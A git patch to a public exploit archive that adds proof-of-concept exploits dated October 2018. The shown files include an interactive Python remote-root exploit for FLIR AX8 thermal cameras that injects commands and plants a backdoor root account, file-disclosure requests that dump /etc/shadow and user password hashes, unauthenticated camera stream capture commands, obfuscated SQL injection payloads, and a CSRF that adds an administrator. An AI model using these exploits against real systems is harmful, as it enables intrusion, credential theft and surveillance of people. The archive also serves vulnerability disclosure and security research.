From 731dd0f423577fa8158a61f08ebb69d0f3e297c1 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Tue, 16 Oct 2018 05:01:45 +0000
Subject: [PATCH] DB: 2018-10-16

22 changes to exploits/shellcodes

Snes9K 0.0.9z - Buffer Overflow (SEH)

NoMachine < 5.3.27 - Remote Code Execution

MaxOn ERP Software 8.x-9.x - 'nomor' SQL Injection
FLIR Brickstream 3D+ - RTSP Stream Disclosure
FLIR AX8 Thermal Camera 1.32.16 - RTSP Stream Disclosure

CAMALEON CMS 2.4 - Cross-Site Scripting
Academic Timetable Final Build 7.0a-7.0b - 'id' SQL Injection
FLIR AX8 Thermal Camera 1.32.16 - Arbitrary File Disclosure
FLIR Brickstream 3D+ 2.1.742.1842 - Config File Disclosure
Academic Timetable Final Build 7.0b - Cross-Site Request Forgery (Add Admin)
AlchemyCMS 4.1 - Cross-Site Scripting
FLIR AX8 Thermal Camera 1.32.16 - Remote Code Execution
College Notes Management System 1.0 - 'user' SQL Injection
Advanced HRM 1.6 - Remote Code Execution
Centos Web Panel 0.9.8.480 - Multiple Vulnerabilities
Academic Timetable Final Build 7.0 - Information Disclosure
KORA 2.7.0 - 'cid' SQL Injection
---
 exploits/hardware/webapps/45597.txt      |  92 ++++++++++++
 exploits/hardware/webapps/45599.txt      |  20 +++
 exploits/hardware/webapps/45602.py       | 179 +++++++++++++++++++++++
 exploits/hardware/webapps/45606.txt      |  24 +++
 exploits/hardware/webapps/45607.txt      |  63 ++++++++
 exploits/php/webapps/45596.txt           | 101 +++++++++++++
 exploits/php/webapps/45600.txt           |  39 +++++
 exploits/php/webapps/45603.txt           |  55 +++++++
 exploits/php/webapps/45604.txt           |  51 +++++++
 exploits/php/webapps/45605.txt           | 118 +++++++++++++++
 exploits/php/webapps/45610.txt           | 172 ++++++++++++++++++++++
 exploits/php/webapps/45612.php           |  60 ++++++++
 exploits/php/webapps/45613.txt           |  38 +++++
 exploits/{php => ruby}/webapps/45592.txt |   0
 exploits/ruby/webapps/45601.txt          |  44 ++++++
 exploits/windows/local/45583.txt         |   1 +
 exploits/windows/local/45585.txt         |   1 +
 exploits/windows/local/45587.txt         |   2 +
 exploits/windows/remote/45611.c          | 111 ++++++++++++++
 exploits/windows_x86/local/45598.py      |  58 ++++++++
 files_exploits.csv                       |  18 ++-
 21 files changed, 1246 insertions(+), 1 deletion(-)
 create mode 100644 exploits/hardware/webapps/45597.txt
 create mode 100644 exploits/hardware/webapps/45599.txt
 create mode 100755 exploits/hardware/webapps/45602.py
 create mode 100644 exploits/hardware/webapps/45606.txt
 create mode 100644 exploits/hardware/webapps/45607.txt
 create mode 100644 exploits/php/webapps/45596.txt
 create mode 100644 exploits/php/webapps/45600.txt
 create mode 100644 exploits/php/webapps/45603.txt
 create mode 100644 exploits/php/webapps/45604.txt
 create mode 100644 exploits/php/webapps/45605.txt
 create mode 100644 exploits/php/webapps/45610.txt
 create mode 100644 exploits/php/webapps/45612.php
 create mode 100644 exploits/php/webapps/45613.txt
 rename exploits/{php => ruby}/webapps/45592.txt (100%)
 create mode 100644 exploits/ruby/webapps/45601.txt
 create mode 100644 exploits/windows/remote/45611.c
 create mode 100755 exploits/windows_x86/local/45598.py

diff --git a/exploits/hardware/webapps/45597.txt b/exploits/hardware/webapps/45597.txt
new file mode 100644
index 000000000..c6cb291d7
--- /dev/null
+++ b/exploits/hardware/webapps/45597.txt
@@ -0,0 +1,92 @@
+# Exploit Title: FLIR AX8 Thermal Camera 1.32.16 - Arbitrary File Disclosure
+# Auhor: Gjoko 'LiquidWorm' Krstic
+# Date: 2018-10-14
+# Vendor: FLIR Systems, Inc.
+# Product web page: https://www.flir.com
+# Affected version: Firmware: 1.32.16, 1.17.13
+# OS: neco_v1.8-0-g7ffe5b3
+# Hardware: Flir Systems Neco Board
+# Tested on: GNU/Linux 3.0.35-flir+gfd883a0 (armv7l), lighttpd/1.4.33, PHP/5.4.14
+# References: 
+# Advisory ID: ZSL-2018-5493
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5493.php
+
+# Desc: The FLIR AX8 thermal sensor camera suffers from an unauthenticated arbitrary 
+# file disclosure vulnerability. Input passed via the 'file' parameter in download.php
+# is not properly verified before being used to download config files. This can be
+# exploited to disclose the contents of arbitrary files via absolute path.
+
+# PoC
+# 1. GET http://TARGET/download.php?file=/etc/passwd HTTP/1.1
+
+root:x:0:0:root:/home/root:/bin/sh
+daemon:x:1:1:daemon:/usr/sbin:/bin/sh
+bin:x:2:2:bin:/bin:/bin/sh
+sys:x:3:3:sys:/dev:/bin/sh
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/bin/sh
+man:x:6:12:man:/var/cache/man:/bin/sh
+lp:x:7:7:lp:/var/spool/lpd:/bin/sh
+mail:x:8:8:mail:/var/mail:/bin/sh
+news:x:9:9:news:/var/spool/news:/bin/sh
+uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
+proxy:x:13:13:proxy:/bin:/bin/sh
+www-data:x:33:33:www-data:/var/www:/bin/sh
+backup:x:34:34:backup:/var/backups:/bin/sh
+list:x:38:38:Mailing List Manager:/var/list:/bin/sh
+irc:x:39:39:ircd:/var/run/ircd:/bin/sh
+gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
+nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
+messagebus:x:999:998::/var/lib/dbus:/bin/false
+fliruser:x:1000:1000::/home/fliruser:/bin/sh
+xuser:x:1001:1001::/home/xuser:/bin/sh
+sshd:x:998:995::/var/run/sshd:/bin/false
+avahi:x:997:994::/var/run/avahi-daemon:/bin/false
+avahi-autoipd:x:996:993:Avahi autoip daemon:/var/run/avahi-autoipd:/bin/false
+
+# 2. GET http://TARGET/download.php?file=/etc/shadow HTTP/1.1
+
+root:qA7LRQDa1amZM:17339:0:99999:7:::
+daemon:*:17339:0:99999:7:::
+bin:*:17339:0:99999:7:::
+sys:*:17339:0:99999:7:::
+sync:*:17339:0:99999:7:::
+games:*:17339:0:99999:7:::
+man:*:17339:0:99999:7:::
+lp:*:17339:0:99999:7:::
+mail:*:17339:0:99999:7:::
+news:*:17339:0:99999:7:::
+uucp:*:17339:0:99999:7:::
+proxy:*:17339:0:99999:7:::
+www-data:*:17339:0:99999:7:::
+backup:*:17339:0:99999:7:::
+list:*:17339:0:99999:7:::
+irc:*:17339:0:99999:7:::
+gnats:*:17339:0:99999:7:::
+nobody:*:17339:0:99999:7:::
+messagebus:!:17339:0:99999:7:::
+fliruser:m1iiKYIJr63u2:17339:0:99999:7:::
+xuser:!:17339:0:99999:7:::
+sshd:!:17339:0:99999:7:::
+avahi:!:17339:0:99999:7:::
+avahi-autoipd:!:17339:0:99999:7:::
+
+# 3. GET http://TARGET/download.php?file=/FLIR/system/profile.d/userPreset.tar HTTP/1.1
+#    GET http://TARGET/download.php?file=/FLIR/usr/www/FLIR/db/users.db HTTP/1.1
+
+lqwrm@metalgear:~/$ sqlite3 users.db 
+SQLite version 3.11.0 2016-02-15 17:29:24
+Enter ".help" for usage hints.
+sqlite> .tables
+roles  users
+sqlite> select * from roles;
+1|admin
+2|user
+3|viewer
+sqlite> select * from users;
+1|admin||$2y$10$/J/KDhh0.UDg5pbwtPG9B.W2gEWrS36qHji1scgxO7uiTk1GuAa.K|1
+2|user||$2y$10$O5Ybml6qN9caTjezQR0f8.z230PavQYUwmZCzMVxL6BMeNvLWEr9q|2
+3|viewer||$2y$10$lxA0o325EuUtVAaTItBt.OSpZSfxIrT56ntm7326FQ/fTBc0ODWqq|3
+4|service||$2y$10$syAL0yMLBfN/8.sciVnCE.kBto6mtVvjrmyhPQAo7oV3rq8X8pBke|4
+5|developer||$2y$10$LBNcMBC/Bn3VVnhlI1j7huOZ.UOykGaq3VZ.YAgu0mAZXAQ8q36uG|5
+sqlite>.q
\ No newline at end of file
diff --git a/exploits/hardware/webapps/45599.txt b/exploits/hardware/webapps/45599.txt
new file mode 100644
index 000000000..a38725350
--- /dev/null
+++ b/exploits/hardware/webapps/45599.txt
@@ -0,0 +1,20 @@
+# Exploit Title: FLIR Brickstream 3D+ 2.1.742.1842 - Config File Disclosure
+# Author: Gjoko 'LiquidWorm' Krstic
+# Date: 2018-10-14
+# Vendor: FLIR Systems, Inc.
+# Product web page: http://www.brickstream.com
+# Affected version: Firmware: 2.1.742.1842, Api: 1.0.0, Node: 0.10.33, Onvif: 0.1.1.47
+# Tested on: Titan, Api/1.0.0
+# References:
+# ZSL-2018-5495
+# https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5495.php
+
+# Desc: The FLIR Brickstream 3D+ sensor is vulnerable to unauthenticated config
+# download and file disclosure vulnerability when calling the ExportConfig REST
+# API (getConfigExportFile.cgi). This will enable the attacker to disclose sensitive
+# information and help her in authentication bypass, privilege escalation and/or
+# full system access.
+
+$ curl http://192.168.2.1:8083/getConfigExportFile.cgi
+$ curl http://192.168.2.1:8083/restapi/system/ExportConfig
+$ curl http://192.168.2.1:8083/restapi/system/ExportLogs
\ No newline at end of file
diff --git a/exploits/hardware/webapps/45602.py b/exploits/hardware/webapps/45602.py
new file mode 100755
index 000000000..a26e2b03f
--- /dev/null
+++ b/exploits/hardware/webapps/45602.py
@@ -0,0 +1,179 @@
+# Exploit Title: FLIR AX8 Thermal Camera 1.32.16 - Remote Code Execution
+# Author: Gjoko 'LiquidWorm' Krstic @zeroscience
+# Date: 2018-10-14
+# Vendor: FLIR Systems, Inc.
+# Product web page: https://www.flir.com
+# Affected version: Firmware: 1.32.16, 1.17.13, OS: neco_v1.8-0-g7ffe5b3, Hardware: Flir Systems Neco Board
+# Tested on: GNU/Linux 3.0.35-flir+gfd883a0 (armv7l), lighttpd/1.4.33, PHP/5.4.14
+# References:
+# Advisory ID: ZSL-2018-5491
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5491.php
+
+# Desc: The FLIR AX8 thermal sensor camera suffers from two unauthenticated
+# command injection vulnerabilities. The issues can be triggered when calling
+# multiple unsanitized HTTP GET/POST parameters within the shell_exec function
+# in res.php and palette.php file. This can be exploited to inject arbitrary
+# system commands and gain root remote code execution.
+
+# /FLIR/usr/www/res.php:
+# ----------------------
+# 1. <?php
+# 2.   if (isset($_POST["action"])) {
+# 3.     switch ($_POST["action"]) {
+# 4.       case "get":
+# 5.         if(isset($_POST["resource"]))
+# 6.         {
+# 7.           switch ($_POST["resource"]) {
+# 8.             case ".rtp.hflip":
+# 9.               if (!file_exists("/FLIR/system/journal.d/horizontal_flip.cfg")) {
+# 10.                $result = "false";
+# 11.                break;
+# 12.              }
+# 13.              $result = file_get_contents("/FLIR/system/journal.d/horizontal_flip.cfg") === "1" ? "true" : "false";
+# 14.              break;
+# 15.            case ".rtp.vflip":
+# 16.              if (!file_exists("/FLIR/system/journal.d/vertical_flip.cfg")) {
+# 17.                $result = "false";
+# 18.                break;
+# 19.              }
+# 20.              $result = file_get_contents("/FLIR/system/journal.d/vertical_flip.cfg") === "1" ? "true" : "false";
+# 21.              break;
+# 22.            default:
+# 23.              $result = trim(shell_exec("LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/rls -o ".$_POST["resource"]));
+# 24.          }
+# 25.        }
+
+# /FLIR/usr/www/palette.php:
+# --------------------------
+# 1. <?php
+# 2.   if(isset($_POST["palette"])){
+# 3.     shell_exec("LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/palette ".$_POST["palette"]);
+# 4.     echo json_encode(array("success"));
+# 5.   }
+# 6. ?>
+
+
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+import requests
+import colorama
+import random##
+import time####
+import json####
+import sys#####
+import os######
+
+piton = os.path.basename(sys.argv[0])
+
+if len(sys.argv) < 2:
+    print '\n\x20\x20[*] Usage: '+piton+' <ip:port>\n'
+    sys.exit()
+
+bannah = """
+.---------------------------------.
+|         1984 Pictures           |
+|                                 |
+|            presents             |
+|                  ___            |
+|                [|   |=|{)__     |
+|                 |___| \/   )    |
+|                  /|\      /|    |
+|                 / | \     | \\   |
+.---------------------------------.
+"""
+print bannah
+time.sleep(4)
+os.system('clear')
+
+print '\nFLIR AX8 Thermal Camera Remote Root Exploit'
+print 'By Zero Science Lab'
+
+ICU = '''
+                ````````                
+           `./+ooosoooooo+/.`           
+        `.+ss+//:::::::://+ss+.`        
+       -oyo/::::-------:::::/oyo-       
+     `/yo+:::-------.------:::+oy/`     
+    `+yo+::---...........----:/+oy+`    
+   `/yo++/--...../+oo+:....---:/+oy/`   
+   `ss++//:-.../yhhhhhhy/...-://++ss`   
+   .ho++/::--.-yhhddddhhy-.--:://+oh.   
+   .ho+//::---/mmmmmmmmmm:---::/++oh.   
+   `ss++//::---+mNNNNNNm+---:://++ss`   
+   `/yo+//:::----+syys+-----://++oy/`   
+    `+yo++//:::-----------:://++oy+`    
+     `/yo++///:::::-:::::://+++oy/`     
+       .oyo+++////////////+++oyo.       
+        `.+ssoo++++++++++ooss+.`        
+           `./+osssssssso+/.`           
+                ````````                
+'''
+
+colors = list(vars(colorama.Fore).values())
+colored_chars = [random.choice(colors) + char for char in ICU]
+
+print(''.join(colored_chars))
+
+print
+print '\x1b[1;37;44m'+'To freeze the stream run:   '+'\x1b[0m'+' /FLIR/usr/bin/freeze on'
+print '\x1b[1;37;41m'+'To unfreeze the stream run: '+'\x1b[0m'+' /FLIR/usr/bin/freeze off\n'
+
+print '[*] Additional commands:'
+print ' [+] \'addroot\' for add root user.'
+print ' [+] \'exit\' for exit.\n'
+
+while True:
+
+    zeTargets = 'http://'+sys.argv[1]+'/res.php'
+    zeCommand = raw_input('\x1b[0;96;49m'+'root@neco-0J0X17:~# '+'\x1b[0m')
+    zeHeaders = {'Cache-Control'   : 'max-age=0',
+                 'User-Agent'      : 'thricer/251.4ev4h',
+                 'Accept'          : 'text/html,application/xhtml+xml',
+                 'Accept-Encoding' : 'gzip, deflate',
+                 'Accept-Language' : 'mk-MK,mk;q=1.7',
+                 'Connection'      : 'close',
+                 'Connection-Type' : 'application/x-www-form-urlencoded'}
+    zePardata = {'action'          : 'get',
+                 'resource'        : ';'+zeCommand}
+
+    try:
+
+        zeRequest = requests.post(zeTargets, headers=zeHeaders, data=zePardata)
+        print json.loads(zeRequest.text)
+
+        if zeCommand.strip() == 'exit':
+            sys.exit()
+
+        if zeCommand.strip() == 'addroot':
+            print '[+] Blind command injection using palette.php...'
+            print '[+] Adding user \'roOt\' with password \'rewt\' in shadow file...'
+
+            nuTargets = 'http://'+sys.argv[1]+'/palette.php'
+            nuHeaders = zeHeaders
+
+            nuHexstrn = ('\\x72\\x6f\\x4f\\x74\\x3a\\x24\\x31'
+                         '\\x24\\x4d\\x4a\\x4f\\x6e\\x56\\x2f'
+                         '\\x59\\x33\\x24\\x74\\x44\\x6e\\x4d'
+                         '\\x49\\x42\\x4d\\x79\\x30\\x6c\\x45'
+                         '\\x51\\x32\\x6b\\x44\\x70\\x66\\x67'
+                         '\\x54\\x4a\\x50\\x30\\x3a\\x31\\x36'
+                         '\\x39\\x31\\x34\\x3a\\x30\\x3a\\x39'
+                         '\\x39\\x39\\x39\\x39\\x3a\\x37\\x3a'
+                         '\\x3a\\x3a\\x0a\\x0d')
+
+            nuPadata1 = {'palette' : '1;echo \"roOt:x:0:0:pwn:/sys:/bin/bash\" >> /etc/passwd'}
+            nuPadata2 = {'palette' : '1;echo -n -e \"'+nuHexstrn+'\" >> /etc/shadow'}
+
+            requests.post(nuTargets, headers=nuHeaders, data=nuPadata1)
+            time.sleep(2)
+            requests.post(nuTargets, headers=nuHeaders, data=nuPadata2)
+            
+            print '[*] Success!\n'
+        else: pass
+
+    except Exception:
+        print '[*] Error!'
+        break
+
+sys.exit()
\ No newline at end of file
diff --git a/exploits/hardware/webapps/45606.txt b/exploits/hardware/webapps/45606.txt
new file mode 100644
index 000000000..5f78f4828
--- /dev/null
+++ b/exploits/hardware/webapps/45606.txt
@@ -0,0 +1,24 @@
+# Exploit Title: FLIR AX8 Thermal Camera 1.32.16 - RTSP Stream Disclosure
+# Author: Gjoko 'LiquidWorm' Krstic @zeroscience
+# Date: 2018-10-14
+# Vendor: FLIR Systems, Inc.
+# Product web page: https://www.flir.com
+# Affected version: Firmware: 1.32.16, 1.17.13, OS: neco_v1.8-0-g7ffe5b3, Hardware: Flir Systems Neco Board
+# Tested on: GNU/Linux 3.0.35-flir+gfd883a0 (armv7l), lighttpd/1.4.33, PHP/5.4.14
+# References:
+# Advisory ID: ZSL-2018-5492
+# https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5492.php
+
+# Desc: The FLIR AX8 thermal sensor camera suffers an unauthenticated and unauthorized
+# live RTSP video stream access.
+
+# PoC 
+
+$ cvlc rtsp://TARGET/mpeg4 --fullscreen
+$ ffmpeg -i rtsp://TARGET/mpeg4 -b 7000k -vcodec copy -r 60 -y ./meltdown.mp4
+$ ffplay rtsp://TARGET/mpeg4
+$ wget http://TARGET/snapshot.jpg ; eog snapshot.jpg
+
+# PoC - To freeze the stream:
+
+$ curl -d "action=set&resource=.image.state.freeze.set&value=true" -X POST http://TARGET/res.php
\ No newline at end of file
diff --git a/exploits/hardware/webapps/45607.txt b/exploits/hardware/webapps/45607.txt
new file mode 100644
index 000000000..f2c0249ee
--- /dev/null
+++ b/exploits/hardware/webapps/45607.txt
@@ -0,0 +1,63 @@
+FLIR Systems FLIR Brickstream 3D+ Unauthenticated RTSP Stream Disclosure
+
+
+Vendor: FLIR Systems, Inc.
+Product web page: http://www.brickstream.com
+Affected version: Firmware: 2.1.742.1842
+                  Api: 1.0.0
+                  Node: 0.10.33
+                  Onvif: 0.1.1.47
+
+Summary: The Brickstream line of sensors provides highly accurate, anonymous
+information about how people move into, around, and out of physical places.
+These smart devices are installed overhead inside retail stores, malls, banks,
+stadiums, transportation terminals and other brick-and-mortar locations to
+measure people's behaviors within the space.
+
+Desc: The FLIR Brickstream 3D+ sensor is vulnerable to unauthenticated and
+unauthorized live RTSP video stream access.
+
+Tested on: Titan
+           Api/1.0.0
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2018-5496
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5496.php
+
+
+26.07.2018
+
+--
+
+
+#!/bin/bash
+#
+# PoC:
+#
+
+echo 'Fetching some images...'
+for x in {1..10};
+    do curl http://192.168.2.1:8083/middleImage.jpg -o sequence-$x.jpg -#;
+    done
+echo 'Done.'
+sleep 2
+echo 'Generating video...'
+sleep 2
+ffmpeg -r 1 -i sequence-%01d.jpg -c:v libx264 -vf fps=60 -pix_fmt yuv444p counted_people.mp4
+echo 'Running generated video...'
+sleep 2
+vlc counted_people.mp4
+
+#
+# http://192.168.2.1:8083/middleImage.jpg
+# http://192.168.2.1:8083/rightimage.jpg
+# http://192.168.2.1:8083/leftimage.jpg
+# http://192.168.2.1:8083/threeDimage.jpg
+# http://192.168.2.1:8083/startStopTrafficMapImage.jpg
+# http://192.168.2.1:8083/dwellTrafficMapImage.jpg
+# http://192.168.2.1:8083/heightTrafficMapImage.jpg
+#
\ No newline at end of file
diff --git a/exploits/php/webapps/45596.txt b/exploits/php/webapps/45596.txt
new file mode 100644
index 000000000..5b3f6529f
--- /dev/null
+++ b/exploits/php/webapps/45596.txt
@@ -0,0 +1,101 @@
+# Exploit Title: Academic Timetable Final Build 7.0a-7.0b - 'id' SQL Injection
+# Dork: N/A
+# Date: 2018-10-13
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://geoffpartridge.net/
+# Software Link: https://sourceforge.net/projects/timetableacademic/files/latest/download
+# Version: 7.0a-7.0b
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1)
+# http://localhost/[PATH]/timetable_pdf_content.php?master=facility&id=[SQL]
+
+-66'%20%20/*!11111unIoN*/%20%20/*!11111sElEcT*/%200x3636%2c0x3636%2c0x3636%2c0x3636%2c0x3636%2c0x3636%2c(/*!11111SelEct*/%20ConCat%20(@:=0%2c(/*!11111SelEct*/%20CoUnt(*) /*!11111frOm*/%20/*!11111inFORmation_schema.tables*/%20/*!11111wHerE*/(TabLE_SCheMA!=0x696e666f726d6174696f6e5f736368656d61)anD@:=ConCat%20(@%2c0x3c62723e%2c/*!11111table_name*/))%2c@))%2c0x3636%2c0x3636%2c0x3636%2c0x3636--%20%20-
+ 
+http://192.168.1.27/[PATH]/timetable_pdf_content.php?master=facility&id=-66%27%20%20/*!11111unIoN*/%20%20/*!11111sElEcT*/%200x3636%2c0x3636%2c0x3636%2c0x3636%2c0x3636%2c0x3636%2c(/*!11111SelEct*/%20ConCat%20(@:=0%2c(/*!11111SelEct*/%20CoUnt(*)%20/*!11111frOm*/%20/*!11111inFORmation_schema.tables*/%20/*!11111wHerE*/(TabLE_SCheMA!=0x696e666f726d6174696f6e5f736368656d61)anD@:=ConCat%20(@%2c0x3c62723e%2c/*!11111table_name*/))%2c@))%2c0x3636%2c0x3636%2c0x3636%2c0x3636--%20%20-
+
+GET /[PATH]/timetable_pdf_content.php?master=facility&id=-66%27%20%20/*!11111unIoN*/%20%20/*!11111sElEcT*/%200x3636%2c0x3636%2c0x3636%2c0x3636%2c0x3636%2c0x3636%2c(/*!11111SelEct*/%20ConCat%20(@:=0%2c(/*!11111SelEct*/%20CoUnt(*)%20/*!11111frOm*/%20/*!11111inFORmation_schema.tables*/%20/*!11111wHerE*/(TabLE_SCheMA!=0x696e666f726d6174696f6e5f736368656d61)anD@:=ConCat%20(@%2c0x3c62723e%2c/*!11111table_name*/))%2c@))%2c0x3636%2c0x3636%2c0x3636%2c0x3636--%20%20- HTTP/1.1
+Host: 192.168.1.27
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+HTTP/1.1 200 OK
+Date: Fri, 13 Oct 2018 01:20:12 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Transfer-Encoding: chunked
+Content-Type: text/html; charset=UTF-8
+
+# POC: 
+# 2)
+# http://localhost/[PATH]/timetable_pdf.php?master=facility&id=[SQL]
+
+-66'%20%20/*!11111unIoN*/%20%20/*!11111sElEcT*/%200x3636%2c0x3636%2c0x3636%2c0x3636%2c0x3636%2c0x3636%2c%28%53%45%4c%45%43%54%20%47%52%4f%55%50%5f%43%4f%4e%43%41%54%28%75%73%65%5f%69%64%2c%30%78%33%61%2c%75%73%65%5f%6e%61%6d%65%2c%30%78%33%61%2c%72%6f%6c%5f%69%64%2c%30%78%33%61%2c%70%77%64%20%53%45%50%41%52%41%54%4f%52%20%30%78%33%63%36%32%37%32%33%65%29%20%46%52%4f%4d%20%6d%73%5f%75%73%65%72%29%2c0x3636%2c0x3636%2c0x3636%2c0x3636--%20%20-
+
+Pdf File: -66'  __!11111unIoN__  __!11111sElEcT__ .......--.pdf
+BT 34.016 451.893 Td /F2 12.0 Tf  [(Notice)] TJ ET
+BT 70.688 451.893 Td /F1 12.0 Tf  [(: Undefined index: db_id in )] TJ ET
+BT 216.104 451.893 Td /F2 12.0 Tf  [([PATH]\\timetable_pdf_content.php)] TJ ET
+BT 786.236 451.893 Td /F1 12.0 Tf  [( on )] TJ ET
+BT 34.016 437.241 Td /F1 12.0 Tf  [(line )] TJ ET
+BT 56.024 437.241 Td /F2 12.0 Tf  [(157)] TJ ET
+BT 34.016 408.189 Td /F2 12.0 Tf  [(Notice)] TJ ET
+BT 70.688 408.189 Td /F1 12.0 Tf  [(: Undefined variable: master_name in )] TJ ET
+BT 34.016 393.537 Td /F2 12.0 Tf  [([PATH]\\timetable_pdf_content.php)] TJ ET
+BT 604.148 393.537 Td /F1 12.0 Tf  [( on line )] TJ ET
+BT 646.172 393.537 Td /F2 12.0 Tf  [(198)] TJ ET
+BT 34.016 378.885 Td /F2 12.0 Tf  [(Facility : [STAFF:Staff:VIEW:)] TJ ET
+BT 34.016 364.233 Td /F2 12.0 Tf  [(STUDENT:Student:VIEW:)] TJ ET
+BT 34.016 349.581 Td /F2 12.0 Tf  [(ADMIN:admin:ADMIN:*4ACFE3202A5FF5CF467898FC58AAB1D615029441])] TJ ET
+1.000 1.000 1.000 rg
+
+# POC: 
+# 3)
+# http://192.168.1.27/[PATH]/server_user.php?iDisplayStart=1[SQL]
+
+%20%2f%2a%21%35%30%30%30%30%50%72%6f%63%65%64%75%72%65%2a%2f%20%2f%2a%21%35%30%30%30%30%41%6e%61%6c%79%73%65%2a%2f%20%28%65%78%74%72%61%63%74%76%61%6c%75%65%28%30%2c%2f%2a%21%35%30%30%30%30%63%6f%6e%63%61%74%2a%2f%28%30%78%32%37%2c%30%78%33%61%2c%40%40%76%65%72%73%69%6f%6e%29%29%2c%30%29%2d%2d%20%2d%20
+
+GET /[PATH]/server_user.php?iDisplayStart=0%20%2f%2a%21%35%30%30%30%30%50%72%6f%63%65%64%75%72%65%2a%2f%20%2f%2a%21%35%30%30%30%30%41%6e%61%6c%79%73%65%2a%2f%20%28%65%78%74%72%61%63%74%76%61%6c%75%65%28%30%2c%2f%2a%21%35%30%30%30%30%63%6f%6e%63%61%74%2a%2f%28%30%78%32%37%2c%30%78%33%61%2c%40%40%76%65%72%73%69%6f%6e%29%29%2c%30%29%2d%2d%20%2d%20 HTTP/1.1
+Host: 192.168.1.27
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+HTTP/1.1 200 OK
+Date: Fri, 13 Oct 2018 01:32:02 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Content-Length: 1408
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+
+# POC: 
+# 4)
+# http://192.168.1.27/[PATH]/server_user.php?iDisplayStart=0&iDisplayLength=1[SQL]
+
+%20%2f%2a%21%35%30%30%30%30%50%72%6f%63%65%64%75%72%65%2a%2f%20%2f%2a%21%35%30%30%30%30%41%6e%61%6c%79%73%65%2a%2f%20%28%65%78%74%72%61%63%74%76%61%6c%75%65%28%30%2c%2f%2a%21%35%30%30%30%30%63%6f%6e%63%61%74%2a%2f%28%30%78%32%37%2c%30%78%33%61%2c%40%40%76%65%72%73%69%6f%6e%29%29%2c%30%29%2d%2d%20%2d%20
+
+GET /[PATH]/server_user.php?iDisplayStart=0&iDisplayLength=10%20%2f%2a%21%35%30%30%30%30%50%72%6f%63%65%64%75%72%65%2a%2f%20%2f%2a%21%35%30%30%30%30%41%6e%61%6c%79%73%65%2a%2f%20%28%65%78%74%72%61%63%74%76%61%6c%75%65%28%30%2c%2f%2a%21%35%30%30%30%30%63%6f%6e%63%61%74%2a%2f%28%30%78%32%37%2c%30%78%33%61%2c%40%40%76%65%72%73%69%6f%6e%29%29%2c%30%29%2d%2d%20%2d%20 HTTP/1.1
+Host: 192.168.1.27
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+HTTP/1.1 200 OK
+Date: Fri, 13 Oct 2018 01:42:25 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Content-Length: 1062
+Keep-Alive: timeout=5, max=94
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
\ No newline at end of file
diff --git a/exploits/php/webapps/45600.txt b/exploits/php/webapps/45600.txt
new file mode 100644
index 000000000..63430e46e
--- /dev/null
+++ b/exploits/php/webapps/45600.txt
@@ -0,0 +1,39 @@
+# Exploit Title: Academic Timetable Final Build 7.0b - Cross-Site Request Forgery (Add Admin)
+# Dork: N/A
+# Date: 2018-10-13
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://geoffpartridge.net/
+# Software Link: https://sourceforge.net/projects/timetableacademic/files/latest/download
+# Version: 7.0a-7.0b
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1)
+# Description
+# New admin can be added..
+ 
+http://192.168.1.27/[PATH]/user.php?act=insert&use_id=1testdb&use_name=1testdb&rol_id=ADMIN&password=1testdb
+
+GET [PATH]/user.php?act=insert&use_id=1testdb&use_name=1testdb&rol_id=ADMIN&password=1testdb HTTP/1.1
+Host: 192.168.1.27
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+HTTP/1.1 200 OK
+Date: Fri, 13 Oct 2018 01:10:29 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Content-Length: 910
+Keep-Alive: timeout=5, max=100
